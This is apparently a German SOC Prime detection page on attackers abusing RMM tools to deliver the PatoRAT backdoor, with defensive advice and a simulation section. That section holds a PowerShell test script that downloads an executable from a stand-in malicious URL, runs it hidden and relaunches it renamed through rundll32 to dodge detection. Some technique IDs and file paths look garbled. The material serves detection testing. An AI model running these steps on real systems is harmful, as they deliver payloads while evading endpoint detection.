SOC Prime Bias: Kritisch

28 Jan 2026 08:41 UTC

Endpunkt-Erkennung von Kürzlichen RMM-Verteilungsvorfällen

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Endpunkt-Erkennung von Kürzlichen RMM-Verteilungsvorfällen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure missbrauchen zunehmend legitime Remote-Monitoring- und Management (RMM)-Tools – wie LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne und SuperOps -, um Malware zu verbreiten und dauerhaften Fernzugriff zu etablieren. Die anfängliche Auslieferung erfolgt oft über bösartige Download-Seiten oder Phishing-E-Mails, gefolgt von einer Ausführung über PowerShell und der Bereitstellung sekundärer Nutzlasten wie der PatoRAT-Backdoor. AhnLab EDR kann die Ausführung dieser RMM-Dienstprogramme erkennen und verhaltensbasierte Warnungen zu verdächtigen Folgeaktivitäten generieren. Der Bericht unterstreicht die Bedeutung der Validierung der Software-Herkunft und der kontinuierlichen Endpunktüberwachung.

Untersuchung

Das AhnLab Security Intelligence Center beobachtete mehrere Kampagnen, in denen Angreifer RMM-Installer als beliebte Anwendungen (zum Beispiel Notepad++, 7-Zip und Telegram) neu verpackten oder verschleierten und sie über bösartige Websites oder Phishing-Anhänge verbreiteten. Nach der Installation registrierten sich die RMM-Agents bei ihrer Herstellerinfrastruktur und wurden dann verwendet, um PowerShell-Nutzlasten auszuführen, die PatoRAT ablegten. Ähnliche Techniken erschienen bei mehreren RMM-Produkten, einschließlich Syncro, das über Phishing mit PDF-Ködern verbreitet wurde. AhnLab EDR-Erkennungslogik wurde entwickelt, um die Ausführung dieser an sich legitimen Binärdateien zu markieren und sie mit Verhaltensweisen nach der Installation zu korrelieren.

Minderung

Überprüfen Sie die Download-Quellen, validieren Sie die Code-Signatur-Zertifikate und vergleichen Sie die Hashes mit offiziellen Anbieter-Veröffentlichungen, bevor Sie RMM-Software in der Umgebung zulassen. Erzwingen Sie eine Anwendungsliste und erfordern Sie ausdrückliche Genehmigungen für die Ausführung von RMM. Überwachen Sie unerwartete RMM-Binärstartvorgänge, anomale PowerShell-Aktivitäten und verdächtige Verbindungen zu Anbieter-Infrastrukturdomainen, wenn solche Tools nicht genehmigt sind. Halten Sie Betriebssysteme und Sicherheitswerkzeuge auf dem neuesten Stand, um die Exposition zu reduzieren.

Reaktion

Wenn eine verdächtige RMM-Ausführung festgestellt wird, isolieren Sie den Host, sammeln Sie forensische Artefakte und entfernen Sie das unbefugte Binärprogramm. Blockieren Sie ausgehende Verbindungen zur Infrastruktur des Tools, um Fernsteuerungskanäle abzuschneiden, und führen Sie einen vollständigen Scan nach sekundären Nutzlasten wie PatoRAT durch. Aktualisieren Sie die Erkennungsinhalte mit beobachteten IOCs und informieren Sie das SOC über die Kampagnenmuster für schnellere Triagen.

Angriffsablauf

Simulation-Ausführung

Voraussetzung: Der Telemetrie- und Basis-Preflight-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die präzise Umsetzung der vom Gegner verwendeten Technik (TTP), die zur Auslösung der Erkennungsregel bestimmt ist. Die Befehle und das Narrativ MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu generieren, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:
    Ein Angreifer liefert eine Phishing-E-Mail mit einem bösartigen Anhang. Der Anhang führt ein PowerShell-Skript aus, das das RMM-Binärprogramm herunterlädt LogMeIn.exe to C:Temp. Um die namensbasierte Erkennung zu umgehen, benennt der Angreifer das Binärprogramm um tool.exe und startet es über rundll32.exe (T1216). Das RMM-Binärprogramm kontaktiert dann den vom Angreifer kontrollierten C2-Server und legt eine Backdoor-Nutzlast ab. Nach der Ausführung löscht der Angreifer das Binärprogramm (T1542.004), um Spuren zu verwischen.

  • Regressionstest-Skript:

    # ---------------------------------------------------------------
    # Simulieren der Ausnutzung des RMM-Tools (Originalname) – sollte auslösen
    # ---------------------------------------------------------------
    $rmmPath = "C:TempLogMeIn.exe"
    Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath
    Write-Host "[*] Ausführen des originalen RMM-Binärprogramms (Alarmauslösung erwarten)..."
    Start-Process -FilePath $rmmPath -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Simulation der Umgehung durch Umbenennung und Proxy-Ausführung – sollte NICHT auslösen
    # ---------------------------------------------------------------
    $evasionPath = "C:Temptool.exe"
    Rename-Item -Path $rmmPath -NewName "tool.exe"
    Write-Host "[*] Umbenanntes RMM-Binärprogramm über rundll32 ausführen (Umgehung)..."
    $rundll = "$env:SystemRootSystem32rundll32.exe"
    Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Bereinigung von Artefakten
    # ---------------------------------------------------------------
    Write-Host "[*] Bereinigen von Binärdateien..."
    Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue
    Write-Host "[*] Simulation abgeschlossen."
  • Bereinigungskommandos:

    # Sicherstellen, dass übrig gebliebene Prozesse beendet werden
    Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Entfernen heruntergeladener Dateien (falls sie noch existieren)
    Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue